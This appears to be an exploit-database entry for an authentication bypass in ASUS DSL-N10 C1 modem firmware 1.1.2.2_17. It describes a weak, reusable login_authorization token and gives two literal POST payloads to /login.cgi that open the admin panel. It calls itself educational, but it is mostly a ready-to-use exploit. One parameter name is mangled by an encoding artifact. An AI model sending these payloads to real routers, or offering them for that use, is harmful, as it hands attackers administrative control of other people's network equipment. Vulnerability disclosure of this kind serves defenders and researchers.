Exploits / Vulnerability Discovered : 2018-08-15 |
Type : webapps |
Platform : hardware
This exploit / vulnerability Asusdsl n10 1.1.2.2_17 authentication bypass is for educational purposes only and if it is used you will do on your own risk!
# 1. Description:
# In ASUS-DSL N10 C1 modem Firmware Version 1.1.2.2_17 there is login_authorization
# parameter in post data, that use for authorization access to admin panel,
# the data of this parameter is not fully random and you can use old data
# or data of another device to access admin panel.
# 2. Proof of Concept:
# Browse http://<Your Modem IP>/login.cgi
# Send this post data:
group_id=&action_mode=&action_script=&action_wait=5¤t_page=Main_Login.asp&next_page=%2Fcgi-bin%2FAdvanced_LAN_Content.asp&login_authorization=YWRtaW46MQ%3D%2D
# Or this post data:
group_id=&action_mode=&action_script=&action_wait=5¤t_page=Main_Login.asp&next_page=%2Fcgi-bin%2FAdvanced_LAN_Content.asp&login_authorization=FWRtaW46MQ%3D5D